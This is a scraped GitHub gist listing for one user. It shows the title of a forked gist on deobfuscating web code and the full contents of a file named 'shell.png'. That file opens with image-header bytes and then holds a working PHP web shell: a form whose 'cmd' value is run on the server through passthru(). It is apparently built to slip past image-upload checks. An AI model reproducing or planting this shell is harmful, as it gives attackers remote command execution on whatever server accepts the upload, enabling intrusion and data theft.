Skip to content

Instantly share code, notes, and snippets.

View Alakinnn's full-sized avatar
🐵

alakinnn Alakinnn

🐵
  • RMIT
  • Ho Chi Minh City
View GitHub Profile
@Alakinnn
Alakinnn / _deobfuscating-unminifying-obfuscated-web-app-code.md
Created September 4, 2025 02:21 — forked from 0xdevalias/_deobfuscating-unminifying-obfuscated-web-app-code.md
Some notes and tools for reverse engineering / deobfuscating / unminifying obfuscated web app code
@Alakinnn
Alakinnn / shell.png
Created June 18, 2025 12:08
for rtf
����
<form action="" method="get">
Command: <input type="text" name="cmd" /><input type="submit" value="Exec" />
</form>
Output:<br />
<pre><?php passthru($_REQUEST['cmd'], $result); ?></pre>